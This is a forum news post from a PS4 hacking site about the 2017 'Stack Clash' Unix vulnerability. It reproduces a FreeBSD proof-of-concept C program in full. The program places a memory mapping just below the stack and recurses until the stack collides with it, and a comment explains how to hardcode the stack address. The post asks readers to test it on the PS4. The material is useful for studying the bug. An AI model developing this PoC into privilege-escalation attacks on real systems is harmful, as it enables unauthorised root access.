Join Us and become a Member for a Verified Badge on Discord to access private areas with the latest PS4 FPKGs.
Category PS4 CFW and Hacks       Thread starter FabOne       Start date Jun 20, 2017 at 1:30 PM       15,101       26            
Following the recently reported Spread Overflow Exploit WebKit Bugs and PS4 MEMEs, a new massive vulnerability in Linux-Kernel, FreeBSD, OpenBSD, Solaris and Unix-based OSes called "Stack Clash" was rediscovered and can be used to gain root privileges on the affected systems. :geek:

Here are some related links with details on the Stack Clash bug:
According to PS4 developers it's currently untested on the PlayStation 4, so if anyone gives it a try let us know your results in this ongoing discussion thread.
Download: 001-stackclash.c
Code:
/*-
 * Copyright (c) 2017 Shawn Webb <[email protected]>
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above
 *    copyright notice, this list of conditions and the following
 *    disclaimer.
 * 2. Redistributions in binary form must reproduce the above
 *    copyright notice, this list of conditions and the following
 *    disclaimer in the documentation and/or other materials
 *    provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote
 *    products derived from this software without specific prior
 *    written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
 * CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
 * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
 * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
 * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
 * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
 * USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
 * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
 * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
 * POSSIBILITY OF SUCH DAMAGE.
 *
 * Stack Clash PoC for FreeBSD.
 *
 * Compile: clang -O0 -fPIE -pie -lprocstat -o 001-stackclash 001-stackclash.c
 *
 * Note: If the security.bsd.unprivileged_proc_debug sysctl node is
 * set to 0, then this PoC as it's written requires root privileges.
 * Since FreeBSD lacks ASLR, you can simply gut out the libprocstat
 * integration and hardcode the stack address (be sure to use the
 * macros to round down to the bottom of the page). There are other
 * tricks you can do to find the stack address. Do what suits you
 * best.
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/param.h>
#include <sys/queue.h>
#include <sys/user.h>
#include <sys/sysctl.h>
#include <sys/mman.h>
#include <libprocstat.h>

unsigned char *
func(void)
{
	unsigned char buf[16];
	int i;

	for (i=0; i < sizeof(buf)-1; i++)
		if (buf[i] == 0x41 && buf[i+1] == 0x41)
			return (buf+i);

	return func();
}

int
main(int argc, char *argv[])
{
	struct procstat *ps;
	struct kinfo_proc *p;
	struct kinfo_vmentry *vm;
	unsigned int i, cnt;
	void *stack_start, *stack_end;
	unsigned char *map, *found;

	stack_start = stack_end = NULL;

	cnt = 0;

	ps = procstat_open_sysctl();
	if (ps == NULL) {
		perror("procstat_open_sysctl");
		return (1);
	}

	p = procstat_getprocs(ps, KERN_PROC_PID, getpid(), &cnt);
	if (cnt == 0) {
		perror("procstat_getprocs");
		return (1);
	}

	cnt = 0;
	vm = procstat_getvmmap(ps, p, &cnt);
	if (cnt == 0) {
		perror("procstat_getvmmap");
		return (1);
	}

	for (i=0; i<cnt; i++) {
		if (vm[i].kve_flags & KVME_FLAG_GROWS_DOWN) {
			stack_start = (void *)vm[i].kve_start;
			stack_end = (void *)vm[i].kve_end;
		}
	}

	if (stack_start == NULL)
		return (1);

	map = mmap(stack_start - (PAGE_SIZE * 2), PAGE_SIZE,
	    PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED
	    | MAP_ANON, -1, 0);

	if (map == (void *)MAP_FAILED) {
		perror("mmap");
		return (1);
	}

	printf("Mapping is at 0x%016lx\n", (unsigned long)map);
	printf("Stack start is at 0x%016lx\n", (unsigned long)stack_start);

	for (i=0; i < PAGE_SIZE; i++)
		map[i] = 0x41;

	found = func();
	if (found != NULL)
		printf("Found 0x41 at %p\n", found);

	return (0);
}
Thanks to @kazookid0 and @X41 for the heads-up in the PSXHAX Shoutbox on this news last night! :thumbup:
Stack Clash Vulnerability in Linux, FreeBSD, OpenBSD & Unix OSes.jpg
 

Comments

Recent Articles
Is It, or Isn't? A PS4 Homebrew Game PKG Written in C++ by NKrapivin
Is it, or isn't? is indeed the latest PS4 homebrew game PKG written in C++ by @nkrapivindev (Nikita Krapivin on Twitter) for use on hacked aka Jailbroken PS4 Consoles. 😻 Download...
DualSense PS5 Controller on Windows via DS4Windows & DualSense Windows
Since the guide on How To Set Up a DualSense PS5 Controller on PC via Bluetooth or USB we have two more ways to get a DualSense PS5 Controller with Updatable Software running on Windows, the first...
The PS5 Scene Gets First PlayStation 5 Game Dumps by BigBlueBox!
We've seen official PS5 PKGs, raw PS5 Game RiPs, some more PS5 Game Images and today PlayStation 5 Scene release group BigBlueBox made available the first PS5 Game Dumps for those who enjoy...
PlayStation Black Friday 2020 is Live with Deals on Games & Subscriptions
Last week we shared some Black Friday 2020 Ad Scans, and this weekend Sony put live their PlayStation Black Friday 2020 featuring unmissable deals on PlayStation games including The Last of Us...
Top